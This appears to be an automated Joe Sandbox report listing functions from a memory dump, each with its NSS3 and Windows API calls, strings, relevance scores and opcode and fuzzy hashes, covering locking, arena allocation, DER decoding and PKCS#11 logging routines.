Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: 7b0c0809a1e1cdb3219e7a6fed3e4d1a7659c0a83e324f4d8069948653837de4
Instruction ID: 88d85d6cba9010b753f69a2e2fa86f70c5fc9a1455c3b54b69e5887e4e134651
Opcode Fuzzy Hash: 7b0c0809a1e1cdb3219e7a6fed3e4d1a7659c0a83e324f4d8069948653837de4
Instruction Fuzzy Hash: 4BF18D71E01209CBEB04CF54D8407ADB7B2BF59358F35816AD925AB781E735E982CF90

Function 6CE84FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6CFD0148,?,6CE96FEC), ref: 6CE8502A
PR_NewLock.NSS3(00000001,00000000,6CFD0148,?,6CE96FEC), ref: 6CE85034
PL_NewHashTable.NSS3(00000000,6CEDFE80,6CEDFD30,6CF2C350,00000000,00000000,00000001,00000000,6CFD0148,?,6CE96FEC), ref: 6CE85055
PL_NewHashTable.NSS3(00000000,6CEDFE80,6CEDFD30,6CF2C350,00000000,00000000,?,00000001,00000000,6CFD0148,?,6CE96FEC), ref: 6CE8506D

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: 9579ed69e18c38f1fa7107e8482992cec15cf035cc7dcd97bbaefbdcf227e82e
Instruction ID: 5905cf6e83dd5f92e103f6c3897104be31242eb96d8bccbef8a08f7d9c8864ca
Opcode Fuzzy Hash: 9579ed69e18c38f1fa7107e8482992cec15cf035cc7dcd97bbaefbdcf227e82e
Instruction Fuzzy Hash: 1231B5B1F136116BFBC09B65884CF5737BA9B1B30CF264118E90A87740EB7A9A04CBD1

Function 6CE22E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6CE22F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6CE22FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6CE23005
memcpy.VCRUNTIME140(?,?,?), ref: 6CE230EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CE23131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE23178

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE23022, 6CE23156, 6CE23162, 6CE2318A, 6CE23196, 6CE231A2, 6CE231AE, 6CE231BA, 6CE231C6
database corruption, xrefs: 6CE2316C
%s at line %d of [%.10s], xrefs: 6CE23171

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: 24a560fdcc02a63f4ee4bddc4690f780a76e45e7dc0737fb27861c2917bf86a0
Instruction ID: 4a21dff93118fc6fbdbba5ddb93b0df83816014cec11c5ca1d4effa8220e30be
Opcode Fuzzy Hash: 24a560fdcc02a63f4ee4bddc4690f780a76e45e7dc0737fb27861c2917bf86a0
Instruction Fuzzy Hash: 01B1CF71E042199BDB18CF9DC885AEEF7B5BF48304F24402AE805B7B41D7799842CFA1

Function 6CEF7F90 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6CEF7FB2

Part of subcall function 6CE7BA40: TlsGetValue.KERNEL32 ref: 6CE7BA51
Part of subcall function 6CE7BA40: TlsGetValue.KERNEL32 ref: 6CE7BA6B
Part of subcall function 6CE7BA40: EnterCriticalSection.KERNEL32 ref: 6CE7BA83
Part of subcall function 6CE7BA40: TlsGetValue.KERNEL32 ref: 6CE7BAA1
Part of subcall function 6CE7BA40: _PR_MD_UNLOCK.NSS3 ref: 6CE7BAC0

PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6CEF7FD4

Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF490AB
Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF490C9
Part of subcall function 6CF49090: EnterCriticalSection.KERNEL32 ref: 6CF490E5
Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF49116
Part of subcall function 6CF49090: LeaveCriticalSection.KERNEL32 ref: 6CF4913F

Part of subcall function 6CEF9430: PR_SetError.NSS3(FFFFD0AC,00000000), ref: 6CEF9466

PR_ExitMonitor.NSS3(?), ref: 6CEF801B
PR_EnterMonitor.NSS3(?), ref: 6CEF8034
TlsGetValue.KERNEL32 ref: 6CEF80A2
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CEF80C0
PR_ExitMonitor.NSS3(?), ref: 6CEF811C
PR_ExitMonitor.NSS3(?), ref: 6CEF8134

Strings

), xrefs: 6CEF80DB

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSection$Error$CountEntryLeave
String ID: )
API String ID: 3537756449-2427484129
Opcode ID: 70fc0c6831cf1bd335e2a908178ca811292f3ba1241f70a968927a033dde8bc9
Instruction ID: 1771f455497ae6caa09b02bf90d4e4592c2d529e7b8892f5551ae804118f06d1
Opcode Fuzzy Hash: 70fc0c6831cf1bd335e2a908178ca811292f3ba1241f70a968927a033dde8bc9
Instruction Fuzzy Hash: 22512872A007049BF7309F369C017DB7BB4AF5330CF64462DD9A946B52EB31A64AC792

Function 6CE9FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON

Download Yara Rule

APIs

PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6CE9FCBD
strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6CE9FCCC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6CE9FCEF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE9FD32
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6CE9FD46
PORT_Alloc_Util.NSS3(00000001), ref: 6CE9FD51
memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6CE9FD6D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CE9FD84

Strings

:, xrefs: 6CE9FD78

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
String ID: :
API String ID: 183580322-336475711
Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction ID: 7bccbd5b3efe2b73cdd598315d9683501c5e8073231590fe063af8a8b0348d0c
Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction Fuzzy Hash: AB31C0B6E012159BEB008AA4DC457AF77B8AF4535CF350128EC14A7B10E77AE919C7D2

Function 6CEB6C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6CEB6C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CEB6C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB6CA3

Part of subcall function 6CF9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CF9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CEB6CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CEB6CD5

Strings

C_DigestInit, xrefs: 6CEB6C61
hSession = 0x%x, xrefs: 6CEB6C7E, 6CEB6C8E
(CK_INVALID_HANDLE), xrefs: 6CEB6C9C
pMechanism = 0x%p, xrefs: 6CEB6CD0

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
API String ID: 1003633598-3690128261
Opcode ID: 8a0de82466daf35468783033f7b1545c326e053cd27d326089a12891d2e2f8f5
Instruction ID: 801a7f7eaaa6e4a353431897b4a5196f054b1b89cbf20b1b60f04f0a2823a56d
Opcode Fuzzy Hash: 8a0de82466daf35468783033f7b1545c326e053cd27d326089a12891d2e2f8f5
Instruction Fuzzy Hash: C4214B30E00104AFDB889B54DE88B6E77B9EB4A31CF154429E508E7B12DF359D0CCB91

Function 6CEB9DD0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SessionCancel), ref: 6CEB9DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CEB9E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB9E33

Part of subcall function 6CF9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CF9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CEB9E49
PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6CEB9E65

Strings

C_SessionCancel, xrefs: 6CEB9DF1
flags = 0x%x, xrefs: 6CEB9E60
hSession = 0x%x, xrefs: 6CEB9E0E, 6CEB9E1E
(CK_INVALID_HANDLE), xrefs: 6CEB9E2C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
API String ID: 1003633598-1678415578
Opcode ID: 823d8283d651bf7c1dbe091422280af9e95e869d22044ce0356a508ae7b72111
Instruction ID: b63c45809aa2b238bf8194a919c55b58f07bb3dd3217a4a66c873637e136f60c
Opcode Fuzzy Hash: 823d8283d651bf7c1dbe091422280af9e95e869d22044ce0356a508ae7b72111
Instruction Fuzzy Hash: 1F214630A01108BFEB809B54DE88B7E77B4AB0A30DF144428F909B7701EF358D48CBA2

Function 6CE80F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CE80F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CE80F84

Part of subcall function 6CEDB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CFB18D0,?), ref: 6CEDB095

SEC_QuickDERDecodeItem_Util.NSS3(?,6CE9F59B,6CFA890C,?), ref: 6CE80FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6CE80FC1

Part of subcall function 6CEE0BE0: malloc.MOZGLUE(6CED8D2D,?,00000000,?), ref: 6CEE0BF8
Part of subcall function 6CEE0BE0: TlsGetValue.KERNEL32(6CED8D2D,?,00000000,?), ref: 6CEE0C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6CE80FDB
PR_CallOnce.NSS3(6CFE2AA4,6CEE12D0), ref: 6CE80FEF
PL_FreeArenaPool.NSS3(?), ref: 6CE81001
PL_FinishArenaPool.NSS3(?), ref: 6CE81009

Strings

security, xrefs: 6CE80F5C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: 87c645c70c1731577cf915bb51e5e8d47503e7d9ec58e3b6509309e2e62bd4f8
Instruction ID: 81de388fe1284f70652bc2fdb6cdc3ce5d575d4ef9b6e9b4bf5666b6f8e55f28
Opcode Fuzzy Hash: 87c645c70c1731577cf915bb51e5e8d47503e7d9ec58e3b6509309e2e62bd4f8
Instruction Fuzzy Hash: FE2106B1900244ABE7109F24DC41AAEB7B8EF4965CF20851DFC189A701FB32E956CBD2

Function 6CE86DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6CE87D8F,6CE87D8F,?,?), ref: 6CE86DC8

Part of subcall function 6CEDFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CEDFE08
Part of subcall function 6CEDFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CEDFE1D
Part of subcall function 6CEDFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CEDFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CE87D8F,?,?), ref: 6CE86DD5

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CFA8FA0,00000000,?,?,?,?,6CE87D8F,?,?), ref: 6CE86DF7

Part of subcall function 6CEDB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CFB18D0,?), ref: 6CEDB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CE86E35

Part of subcall function 6CEDFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CEDFE29
Part of subcall function 6CEDFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CEDFE3D
Part of subcall function 6CEDFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CEDFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CE86E4C

Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CFA8FE0,00000000), ref: 6CE86E82

Part of subcall function 6CE86AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CE8B21D,00000000,00000000,6CE8B219,?,6CE86BFB,00000000,?,00000000,00000000,?,?,?,6CE8B21D), ref: 6CE86B01
Part of subcall function 6CE86AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CE86B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CE86F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CE86F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CFA8FE0,00000000), ref: 6CE86F6B
PR_SetError.NSS3(FFFFE005,00000000,6CE87D8F,?,?), ref: 6CE86FE1

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: abcf382b38dd3014f5a47bbee103d715584780bf39f2a96741e9815a5146997f
Instruction ID: cce9ad1731f75c4e250a13eec38b435570ee000da3f8119c0b5d608f2fffd885
Opcode Fuzzy Hash: abcf382b38dd3014f5a47bbee103d715584780bf39f2a96741e9815a5146997f
Instruction Fuzzy Hash: 7A719F71E216469BDB00CF55CD41BAAB7B9BF9430CF254229E808DBB11F770EA95CB90

Function 6CEC0FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CEC1057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEC1085
PK11_GetAllTokens.NSS3 ref: 6CEC10B1
free.MOZGLUE(?), ref: 6CEC1107
PR_SetError.NSS3(00000000,00000000), ref: 6CEC1172
free.MOZGLUE(?), ref: 6CEC1182
free.MOZGLUE(?), ref: 6CEC11A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6CEC11C5

Part of subcall function 6CEC52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6CE9EAC5,00000001), ref: 6CEC52DF
Part of subcall function 6CEC52C0: EnterCriticalSection.KERNEL32(?), ref: 6CEC52F3
Part of subcall function 6CEC52C0: PR_Unlock.NSS3(?), ref: 6CEC5358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CEC11D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CEC11F3

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: 297ecb0a934543c57356f06713a8ea7822fa33d28ea6438b1090e9f1786499aa
Instruction ID: 86a46f1c56d7341a03171dbf621c75df4e164221f1bacb6bc5a9795a65a15dc2
Opcode Fuzzy Hash: 297ecb0a934543c57356f06713a8ea7822fa33d28ea6438b1090e9f1786499aa
Instruction Fuzzy Hash: 676194B5F003459FEB00DFA4D981B9EB7B5AF05348F244128EC29AB741EB71E945CB92

Function 6CECADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6CEACDBB,?,6CEAD079,00000000,00000001), ref: 6CECAE10
EnterCriticalSection.KERNEL32(?,?,6CEACDBB,?,6CEAD079,00000000,00000001), ref: 6CECAE24
PR_Unlock.NSS3(?,?,?,?,?,?,6CEAD079,00000000,00000001), ref: 6CECAE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CEACDBB,?,6CEAD079,00000000,00000001), ref: 6CECAE6F
free.MOZGLUE(85145F8B,?,?,?,?,6CEACDBB,?,6CEAD079,00000000,00000001), ref: 6CECAE7F
TlsGetValue.KERNEL32(?,6CEACDBB,?,6CEAD079,00000000,00000001), ref: 6CECAEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CEACDBB,?,6CEAD079,00000000,00000001), ref: 6CECAEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CEACDBB,?,6CEAD079,00000000,00000001), ref: 6CECAEF1
free.MOZGLUE(6CEACDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CEACDBB,?), ref: 6CECAF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CEACDBB,?,6CEAD079,00000000,00000001), ref: 6CECAF30

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: b75121c9e48049388f5b9179dec9dd689360001124f2937a5676e38f3a5fa2ff
Instruction ID: d6c4c1ef70ebf5c2c59e69cf884f54dc670b408d399f8d5e7f4af7804a67d221
Opcode Fuzzy Hash: b75121c9e48049388f5b9179dec9dd689360001124f2937a5676e38f3a5fa2ff
Instruction Fuzzy Hash: 2551A1B1A40601AFDB40DF29D985B59B7B4FF09318F244668E92897F11E731F8A4CBD2

Function 6CEA4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6CEAAB7F,?,00000000,?), ref: 6CEA4CB4
EnterCriticalSection.KERNEL32(0000001C,?,6CEAAB7F,?,00000000,?), ref: 6CEA4CC8
TlsGetValue.KERNEL32(?,6CEAAB7F,?,00000000,?), ref: 6CEA4CE0
EnterCriticalSection.KERNEL32(?,?,6CEAAB7F,?,00000000,?), ref: 6CEA4CF4
PL_HashTableLookup.NSS3(?,?,?,6CEAAB7F,?,00000000,?), ref: 6CEA4D03
PR_Unlock.NSS3(?,00000000,?), ref: 6CEA4D10

Part of subcall function 6CF2DD70: TlsGetValue.KERNEL32 ref: 6CF2DD8C
Part of subcall function 6CF2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF2DDB4

PR_Now.NSS3(?,00000000,?), ref: 6CEA4D26

Part of subcall function 6CF49DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CF90A27), ref: 6CF49DC6
Part of subcall function 6CF49DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CF90A27), ref: 6CF49DD1
Part of subcall function 6CF49DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF49DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6CEA4D98
